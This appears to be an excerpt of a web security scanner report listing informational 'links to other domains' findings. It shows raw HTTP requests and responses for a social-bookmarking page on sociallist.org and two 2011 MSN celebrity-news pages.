http://www.stumbleupon.com/submit?url=&title=&newcomment=&tagnames=
http://www.thisnext.com/pick/new/submit/sociable/?url=&name=
https://favorites.live.com/quickadd.aspx?marklet=1&mkt=en-us&url=&title=&top=1

Request

GET /submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content
...[SNIP]...
</script>


                   <a href="http://twitter.com/home?status=%20" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-twitter-com.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.google.com/bookmarks/mark?op=add&bkmk=&title=&labels=&annotation=&cd=bm&btnA=Add" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-google-com-bookmarks.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://digg.com/submit?phase=2&url=&title=&bodytext=&topic=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-digg-com.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.stumbleupon.com/submit?url=&title=&newcomment=&tagnames=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-stumbleupon-com.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://reddit.com/submit?url=&title=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-reddit-com.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.squidoo.com/lensmaster/bookmark?" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-squidoo-com.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://del.icio.us/post/?url=&title=&notes=&tags=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-del-icio-us.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://technorati.com/faves/?add=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-technorati-com.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.facebook.com/sharer.php?u=&t=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-www-facebook-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.myspace.com/Modules/PostTo/Pages/?c=&t=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-www-myspace-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.mixx.com/submit?page_url=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-www-mixx-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://slashdot.org/slashdot-it.pl?op=basic&url=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-slashdot-org-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.diigo.com/post?b_mode=0&c_mode=0&url=&title=&comments=&tag=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-diigo-com.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://myweb2.search.yahoo.com/myresults/bookmarklet?u=title=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-myweb2-search-yahoo-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://favorites.my.aol.com/ffclient/AddBookmark?url=&title=&favelet=true" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-favorites-my-aol-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://cgi.fark.com/cgi/fark/submit.pl" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-www-fark-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://multiply.com/gus/journal/compose/addthis?body=&url=&subject=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-multiply-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="https://favorites.live.com/quickadd.aspx?marklet=1&mkt=en-us&url=&title=&top=1" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-favorites-live-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.newsvine.com/_tools/seed&save?u=&h=&blurb=&tags=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-newsvine-com.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.folkd.com/submit/" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-folkd-com.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://bookmarks.yahoo.com/toolbar/savebm?opener=tb&u=&t=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-bookmarks-yahoo-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://linuxdev1.tlt.psu.edu/pligg/submit.php?url=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-linuxdev1-tlt-psu-edu-pligg-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://jumptags.com/" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-jumptags-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.dzone.com/links/add.html?url=&title=&description=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-www-dzone-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.mister-wong.com/addurl/?bm_url=&bm_description=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-www-mister-wong-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://myjeeves.ask.com/mysearch/BookmarkIt?v=1.2&t=webpages&url=&title=&abstext=&tagField=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-myjeeves-ask-com.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.blinklist.com/?Action=Blink/addblink.php&Description=&Url=&Title=&Tag=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-blinklist-com.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.killerstartups.com/register/submit.php?url=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-www-killerstartups-com-register-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://faves.com/Authoring.aspx?u=&t=&noteText=&tagsText=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-faves-com.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.blurpalicious.com/submit.php?url=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-www-blurpalicious-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.bibsonomy.org/ShowBookmarkEntry?c=b&jump=yes&url=&description=&extended=&tags=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-bibsonomy-org.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.thisnext.com/pick/new/submit/sociable/?url=&name=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-www-thisnext-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.propeller.com/submit?storyUrl=&storyTitle=&storyText=&storyTags=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-propeller-com.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.connotea.org/addpopup?continue=confirm&uri=&title=&description=&tags=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-connotea-org.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.kirtsy.com/submit.php?url=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-www-kirtsy-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://buddymarks.com/add_bookmark.php?bookmark_url=&bookmark_title=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-buddymarks-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.designfloat.com/submit.php?url=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-www-designfloat-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://sphinn.com/submit.php?url=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-sphinn-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.spurl.net/spurl.php?url=&title=&keywords=&description=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-spurl-net.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.corank.com/submit?url=&title=&source=w" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-corank-com.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.linkagogo.com/go/AddNoPopup?url=&title=&comments=&keywords=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-linkagogo-com.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.mylinkvault.com/link-page.php?u=&n=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-www-mylinkvault-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.pligg.com/submit.php?url=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-www-pligg-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.dropjack.com/submit.php?url=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-www-dropjack-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.bizsugar.com/submit.php?url=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-www-bizsugar-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.dealigg.com/submit.php?url=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-www-dealigg-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.blogengage.com/submit.php?url=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-www-blogengage-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://postonfire.com/submit.php?url=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-postonfire-com-.gif" border="0" width="16" height="16" />
...[SNIP]...
</a>


                   <a href="http://www.indianpad.com/submit.php?url=" class="bm"><img src="http://sociallist.org/images.static/sociallist.org/icons.gif/http-indianpad-com.gif" border="0" width="16" height="16" />
...[SNIP]...
<p class="legal">
                   <a href="http://ktulhu.net/">Website created by Codemaster</a>
...[SNIP]...
<p class="legal">

           <a href="http://www.itemname.com/">Download</a>
       <a href="http://www.freedownloadutilities.com/">utilities</a> <a href="http://www.realfreedownload.com">software</a>,
       <a href="http://www.bestbuygame.com/">buy</a> and <a href="http://www.freshgameplay.com/">play</a>
       <a href="http://www.egolddomain.com/">online</a> <a href="http://www.gaamle.com/">games</a>
       for PC and <a href="http://mac.itemname.com/">Apple Mac</a> in new era of <a href="http://relatelist.com/">Intelligence</a>
...[SNIP]...

17.178. http://specials.msn.com/A-List/Entertainment/Ali-Larters-baby-story.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Ali-Larters-baby-story.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.msn.com/A-List/Entertainment/Ali-Larters-baby-story.aspx?cp-documentid=27493063

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/images/search?q=%2bali+larter+hayes+macarthur+wedding&FORM=msnpop
http://www.bing.com/images/search?q=ali+larter&qpvt=Ali+Larter+&FORM=msnpop
http://www.bing.com/images/search?q=nbc+perfect+couples+cast&go=&form=msnpop
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm
http://www.bing.com/search?q=Ali+Larter+&form=msnpop
http://www.bing.com/search?q=Hayes+MacArthur&form=msnpop
http://www.bing.com/search?q=Heroes+tv+show&form=msnpop
http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm
http://www.bing.com/search?q=Larter+US+weekly+Four+hours+after+the+fireman+opened+it%2C+I+was+in+labor&go=&form=msnpop
http://www.bing.com/search?q=Larter+US+weekly+mudslides&go=&form=msnpop
http://www.bing.com/search?q=Perfect+Couples+tv+show&form=msnpop
http://www.bing.com/search?q=ali+larter+new+baby&go=&form=msnpop
http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm
http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/search?q=NBC+Heroes+&go=&form=msnpop
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661307&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FEntertainment%2FAli-Larters-baby-story.aspx%3Fcp-documentid%3D27493063&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Entertainment/Ali-Larters-baby-story.aspx?cp-documentid=27493063 HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:47 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=83aaef00cbd243918122106211cfcfb5; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=AB8BB9B6AFF849E0A9D598F1D2CC672A; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:47 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661307&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FEntertainment%2FAli-Larters-baby-story.aspx%3Fcp-documentid%3D27493063&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=ali+larter+new+baby&go=&form=msnpop"><strong>
...[SNIP]...
<div>"<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Heroes+tv+show&form=msnpop">Heroes</a>" actress <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Ali+Larter+&form=msnpop">Ali Larter</a> (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=ali+larter&qpvt=Ali+Larter+&FORM=msnpop">see photos</a>) has an interesting birth story. The actress <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Larter+US+weekly+mudslides&go=&form=msnpop">told US Weekly</a> about <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Larter+US+weekly+mudslides&go=&form=msnpop">the dramatic event</a>, ...During the L.A. mud slides, our street was closed.... (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Larter+US+weekly+Four+hours+after+the+fireman+opened+it%2C+I+was+in+labor&go=&form=msnpop">Find out</a>
...[SNIP]...
<div>Larter and her husband, actor <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Hayes+MacArthur&form=msnpop">Hayes MacArthur</a>, were married in 2009. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=%2bali+larter+hayes+macarthur+wedding&FORM=msnpop">See photos</a>
...[SNIP]...
<div>MacArthur is currently starring in the NBC show ...<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Perfect+Couples+tv+show&form=msnpop">Perfect Couples</a>.... <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=nbc+perfect+couples+cast&go=&form=msnpop">See photos</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=NBC+Heroes+&go=&form=msnpop">Watch clips</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm">'Cuckoo's Nest' & remains</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm">Punxsutawney Phil</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm">Ines Sainz...s outfit</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm">Airport weather delays</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.179. http://specials.msn.com/A-List/Entertainment/Britney-Spears-as-maid-of-honor.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Britney-Spears-as-maid-of-honor.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.msn.com/A-List/Entertainment/Britney-Spears-as-maid-of-honor.aspx?cp-documentid=27490734

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/images/search?q=Jason+Trawick+and+Britney+Spears&go=&form=msnpop
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/music/overview/search?q=Britney+Spears&go=&form=msnpop
http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm
http://www.bing.com/search?q=Britney+Spears+and+pal's+sick+son&FORM=msnpop
http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm
http://www.bing.com/search?q=North+Miami+Beach+Spanish+Monastery+&FORM=msnpop
http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm
http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm
http://www.bing.com/search?q=spears+maid+of+honor&go=&form=msnpop
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/search?q=Spears+and+Blackout&FORM=msnpop
http://www.bing.com/videos/search?q=Spears+and+Hold+It+Against+Me&go=&form=msnpop
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661317&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FEntertainment%2FBritney-Spears-as-maid-of-honor.aspx%3Fcp-documentid%3D27490734&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Entertainment/Britney-Spears-as-maid-of-honor.aspx?cp-documentid=27490734 HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:57 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a685e0170a0e40f3bc4d71e18a38bb35; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=80A249B697F546829C92B1B8A05B3E4E; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:57 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661317&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FEntertainment%2FBritney-Spears-as-maid-of-honor.aspx%3Fcp-documentid%3D27490734&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=spears+maid+of+honor&go=&form=msnpop"><strong>
...[SNIP]...
<div>The singer, who recently released a No. 1 single <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=Spears+and+Hold+It+Against+Me&go=&form=msnpop">(watch</a>), served as her assistant...s attendant at a Florida wedding. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=North+Miami+Beach+Spanish+Monastery+&FORM=msnpop">Find out where</a>.) The singer reportedly has also rehired her boyfriend...s PR firm. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=Jason+Trawick+and+Britney+Spears&go=&form=msnpop">See them together</a>
...[SNIP]...
<div>Spears' upcoming album reportedly will return to the grittiness of a previous album. (Find out <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=Spears+and+Blackout&FORM=msnpop">which</a>
...[SNIP]...
<div>In another act of kindness, the singer is reportedly auctioning off a dress. (Find out <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Britney+Spears+and+pal's+sick+son&FORM=msnpop">why</a>
...[SNIP]...
